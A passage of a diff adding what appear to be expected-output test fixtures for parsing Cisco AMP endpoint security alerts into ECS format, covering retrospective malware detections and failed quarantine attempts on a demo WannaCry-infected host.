+ }, + "detection_id": "6419204897366867969", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500193359Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419247189909832000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419179204872503298", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500195409Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419247189909832000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 
+ }, + "detection_id": "6419229327140847665", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500197554Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419247189909832000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419204897366867977", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": 
"Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500199614Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419247189909831755", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500201691Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419247189909831754", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "qeriuwjhrf", + "path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500203753Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", 
+ "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419247189909831753", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500205814Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229327140847658", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": 
[ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500207872Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + 
"network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204897366867969", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500209928Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179204872503298", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500212001Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419247189909832000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
